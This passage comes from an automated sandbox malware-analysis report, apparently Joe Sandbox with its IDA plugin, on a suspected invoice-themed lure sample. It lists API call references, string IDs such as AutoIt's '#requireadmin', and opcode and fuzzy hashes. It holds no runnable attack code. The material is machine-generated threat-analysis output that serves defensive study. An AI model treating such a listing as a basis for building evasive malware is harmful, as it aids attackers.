                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: b905d71df655fdf4b628348b4e9797dd80c722ba10f8a0ca179731167be38f52
                                    • Instruction ID: a9cfe61e5ae8993b84ea70dd15337b13bd0108261918484d4cf0c55dec85f434
                                    • Opcode Fuzzy Hash: b905d71df655fdf4b628348b4e9797dd80c722ba10f8a0ca179731167be38f52
                                    • Instruction Fuzzy Hash: B82160B5601208AFDB12DF64DCD1DBB37ADEB4A394B050059FA109B291DB31EC12CB60
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 176396367-2734436370
                                    • Opcode ID: 54c72ab0df46cb1ebc7eb88b4c9a428d36e3c3bc82a36c3738a5c66df724f22b
                                    • Instruction ID: 4d187dffed7113fb46a4987d7dee938ddec63dde22f299939ac6a6b62113d1f6
                                    • Opcode Fuzzy Hash: 54c72ab0df46cb1ebc7eb88b4c9a428d36e3c3bc82a36c3738a5c66df724f22b
                                    • Instruction Fuzzy Hash: A8215B7220462166C733AB24DC02FB773DC9F52310F15802BFA4ADB089EB71AD45C295
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00393840
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00393850
                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00393876
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: 7c25e02be2c4986c8d418aa9f3c7a17a8ed6234b1d90f80ca78e8f09fa799f0f
                                    • Instruction ID: f5886601b15e88346fa362cbe72264bfe747e661c0d0d13d9b6b8c6eaa85ca6c
                                    • Opcode Fuzzy Hash: 7c25e02be2c4986c8d418aa9f3c7a17a8ed6234b1d90f80ca78e8f09fa799f0f
                                    • Instruction Fuzzy Hash: 6221D4B2614118BBEF238F94CC45FBB376EEF89750F118114F9009B190C672DC5187A0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00374A08
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00374A5C
                                    • SetErrorMode.KERNEL32(00000000,?,?,0039CC08), ref: 00374AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume
                                    • String ID: %lu
                                    • API String ID: 2507767853-685833217
                                    • Opcode ID: 7bffd06cf8661484e9323169bbe58d9d18b6c6be25358c9a873a6cb291c0b273
                                    • Instruction ID: 5a57f3e9a230095e79208edf32d5a03a180d4224b8c23ad56d8a7d202b70e8c7
                                    • Opcode Fuzzy Hash: 7bffd06cf8661484e9323169bbe58d9d18b6c6be25358c9a873a6cb291c0b273
                                    • Instruction Fuzzy Hash: BD315175A00109AFDB12DF64C985EAA7BF8EF08308F1480A9F909DF252D775ED45CB61
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0039424F
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00394264
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00394271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: a7966b7b49781589e7c8205897f34c5f646549fc7f233bba2a2241cb0a21129e
                                    • Instruction ID: a9e5c6b9232910eeecb24f3656f40e874488b8aac1bc28485487e2f31ec62301
                                    • Opcode Fuzzy Hash: a7966b7b49781589e7c8205897f34c5f646549fc7f233bba2a2241cb0a21129e
                                    • Instruction Fuzzy Hash: 32110632240208BEEF225F39CC06FAB7BACEF85B54F120524FA95E6090D271DC529B20
                                    APIs
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                      • Part of subcall function 00362DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00362DC5
                                      • Part of subcall function 00362DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00362DD6
                                      • Part of subcall function 00362DA7: GetCurrentThreadId.KERNEL32 ref: 00362DDD
                                      • Part of subcall function 00362DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00362DE4
                                    • GetFocus.USER32 ref: 00362F78
                                      • Part of subcall function 00362DEE: GetParent.USER32(00000000), ref: 00362DF9
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00362FC3
                                    • EnumChildWindows.USER32(?,0036303B), ref: 00362FEB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                    • String ID: %s%d
                                    • API String ID: 1272988791-1110647743
                                    • Opcode ID: e1d2bc40ee3fafb26dfeb961d73a732771a974f42b421407e46417363f178f74
                                    • Instruction ID: 53f2d3486dff8ccfcc63054245f8568786c2d7b8a94462155d572b4eda3424cd
                                    • Opcode Fuzzy Hash: e1d2bc40ee3fafb26dfeb961d73a732771a974f42b421407e46417363f178f74
                                    • Instruction Fuzzy Hash: C911E1B12002056BCF06BF74CC96FEE376AAF84304F048075F9099F29ADE7099498B70
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003958C1
                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003958EE
                                    • DrawMenuBar.USER32(?), ref: 003958FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$InfoItem$Draw
                                    • String ID: 0
                                    • API String ID: 3227129158-4108050209
                                    • Opcode ID: f711b9dfb6b5672e1800a140fbd97b246be953f0734cb7c0455bf9d1c455bc0a
                                    • Instruction ID: cf33057b563f3d76278481efe705788777226ba9d9ef70931be91bf3b5cbf7c7
                                    • Opcode Fuzzy Hash: f711b9dfb6b5672e1800a140fbd97b246be953f0734cb7c0455bf9d1c455bc0a
                                    • Instruction Fuzzy Hash: 80015B32504218EFDF239F22DC44BAEBBB8FB45761F10809AE849DA151DB308AC4DF21
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76d10db9b26a01c5b8f0a9d3ea5cfd68e36f834312de913d3a1dac3fe02b4d20
                                    • Instruction ID: 52c26a2446ed5583a7e1d056b5087da484812de02bea23e342340358171e2120
                                    • Opcode Fuzzy Hash: 76d10db9b26a01c5b8f0a9d3ea5cfd68e36f834312de913d3a1dac3fe02b4d20
                                    • Instruction Fuzzy Hash: DDC16D75A00206EFCB19CFA4C895EAEB7B5FF49304F218598E505EB255D731ED41CB90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInitInitializeUninitialize
                                    • String ID:
                                    • API String ID: 1998397398-0
                                    • Opcode ID: c6630ea6157f195d29d00a0f3ce91879550195c1bfddc744be41ffe730923331
                                    • Instruction ID: bc9d410b0f135ab98f019185ab2b842a7fb15997a2f259ed59f9eca9d7ed94e8
                                    • Opcode Fuzzy Hash: c6630ea6157f195d29d00a0f3ce91879550195c1bfddc744be41ffe730923331
                                    • Instruction Fuzzy Hash: 35A15E756043019FC702EF28C895A6AB7E5FF89714F058899F9899F3A1DB30EE41CB51
                                    APIs
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0039FC08,?), ref: 003605F0
                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0039FC08,?), ref: 00360608
                                    • CLSIDFromProgID.OLE32(?,?,00000000,0039CC40,000000FF,?,00000000,00000800,00000000,?,0039FC08,?), ref: 0036062D
                                    • _memcmp.LIBVCRUNTIME ref: 0036064E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    • Opcode ID: f86612340a66153d1eea7aff7f80aa55475899c246bbd4d5cc5a53d3080f2f87
                                    • Instruction ID: 85d3acfa5b2d01c4fd203b71e3eaee26d82976f64949d758d1fb582405aad7b7
                                    • Opcode Fuzzy Hash: f86612340a66153d1eea7aff7f80aa55475899c246bbd4d5cc5a53d3080f2f87
                                    • Instruction Fuzzy Hash: 94812A71A00109EFCB05DF94C985EEEB7B9FF89315F208598E506AB254DB71AE06CF60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: c7037291d336eb24a8068678bb1b6f1d08dbc8778ce2ed2877f4791eb3b2f39d
                                    • Instruction ID: 31e06b408395a66a7ae64e3d635d00000a371028fd7a36c296bfb75356c96ef3
                                    • Opcode Fuzzy Hash: c7037291d336eb24a8068678bb1b6f1d08dbc8778ce2ed2877f4791eb3b2f39d
                                    • Instruction Fuzzy Hash: 4F417F35A00A10AFDB236BBAAC857BE3AF8EF42370F150625F418DE391E77458C15761
                                    APIs
                                    • GetWindowRect.USER32(0125E5B8,?), ref: 003962E2
                                    • ScreenToClient.USER32(?,?), ref: 00396315
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00396382
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 54329510fc6d275d45c82a91d5d195499a96970cd17f04ae011b77a0d36ddebf
                                    • Instruction ID: 2d784da7299545baa55a08e8accf5a9ee0b6c3c79f2b12895cd0165160675c98
                                    • Opcode Fuzzy Hash: 54329510fc6d275d45c82a91d5d195499a96970cd17f04ae011b77a0d36ddebf
                                    • Instruction Fuzzy Hash: 7C517D74A01209EFDF12CF68D8819AE7BB5FF45360F11815AF8159B2A0D730ED81CB90
                                    APIs
                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00381AFD
                                    • WSAGetLastError.WSOCK32 ref: 00381B0B
                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00381B8A
                                    • WSAGetLastError.WSOCK32 ref: 00381B94
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$socket
                                    • String ID:
                                    • API String ID: 1881357543-0
                                    • Opcode ID: 4957a36737b3d8f3188c451d941d3da237bb5d04367db6703869cc2f90b88523
                                    • Instruction ID: 2a739b99fd5587261e5e087ffc1a404525ffd43303d48a5e3047b00492cb9463
                                    • Opcode Fuzzy Hash: 4957a36737b3d8f3188c451d941d3da237bb5d04367db6703869cc2f90b88523
                                    • Instruction Fuzzy Hash: A741C4746003006FE726AF24C896F6977E9AB44718F548498F91A9F3D2D772ED82CB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c320f3d57bb25b782b26b2a6442b27014fec83031f45f5f47649534565153406
                                    • Instruction ID: bc5a5275b56089b36ff00e18f4ab288883531c51482d146707d83ec8e398c6a0
                                    • Opcode Fuzzy Hash: c320f3d57bb25b782b26b2a6442b27014fec83031f45f5f47649534565153406
                                    • Instruction Fuzzy Hash: D8410675A00714AFE7269F78CC81B6ABBE9EF89710F10462EF241DF692D771A9418780
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00375783
                                    • GetLastError.KERNEL32(?,00000000), ref: 003757A9
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003757CE
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003757FA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: 0f9f3d2ece9330077487f5245a8caa37d85b3b76cb51ef935f963c1934e4ee6f
                                    • Instruction ID: 602d80ce586b2a470c4053cf64ec26b0b4f1df38b1390c7bb7ef64432a5c93d6
                                    • Opcode Fuzzy Hash: 0f9f3d2ece9330077487f5245a8caa37d85b3b76cb51ef935f963c1934e4ee6f
                                    • Instruction Fuzzy Hash: AA412F39600610DFCB26DF19C554A5EBBE5EF49720B19C488E84A5F3A2CB75FD40CB91
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00326D71,00000000,00000000,003282D9,?,003282D9,?,00000001,00326D71,?,00000001,003282D9,003282D9), ref: 0033D910
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0033D999
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0033D9AB
                                    • __freea.LIBCMT ref: 0033D9B4
                                      • Part of subcall function 00333820: RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    • Opcode ID: eafd0a8be68d2f95fd60c58c27c4a5105865de75843e0d9c607fd68f1124fe41
                                    • Instruction ID: fec3a4533c30cebc5dd582491b0419c3aa55c8eba32490e01f6c62b1c5341da5
                                    • Opcode Fuzzy Hash: eafd0a8be68d2f95fd60c58c27c4a5105865de75843e0d9c607fd68f1124fe41
                                    • Instruction Fuzzy Hash: BD31C172A0021AABDF26DF64EC81EAF7BA9EB41310F064169FC04DB151EB35DD54CBA0
                                    APIs
                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00395352
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00395375
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00395382
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003953A8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LongWindow$InvalidateMessageRectSend
                                    • String ID:
                                    • API String ID: 3340791633-0
                                    • Opcode ID: 22e0be1532d3299d498da493e977721984f322d16a74e4398191d4b97304f5c4
                                    • Instruction ID: 23f1c499ab7c850baeaa46ee8b86f47be37cfbccf4b87d1945abd2429d6b2591
                                    • Opcode Fuzzy Hash: 22e0be1532d3299d498da493e977721984f322d16a74e4398191d4b97304f5c4
                                    • Instruction Fuzzy Hash: 8D31E338A55A08FFEF339E54CC95BE87769AB05390F594102FA10961E1C7B19DC09B41
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0036ABF1
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 0036AC0D
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 0036AC74
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0036ACC6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 69dd830c121d08ed2d8742de4091599994882107dcc4172266a38f5991956d21
                                    • Instruction ID: 7ee2d273d994eca789c2a720de06d969bfe3bb020c656f136334dd7b620e03bf
                                    • Opcode Fuzzy Hash: 69dd830c121d08ed2d8742de4091599994882107dcc4172266a38f5991956d21
                                    • Instruction Fuzzy Hash: EC313B70A04B186FEF37CB658C087FA7BA9AB45310F04C31BE485E61D8C375D9819B62
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0039769A
                                    • GetWindowRect.USER32(?,?), ref: 00397710
                                    • PtInRect.USER32(?,?,00398B89), ref: 00397720
                                    • MessageBeep.USER32(00000000), ref: 0039778C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
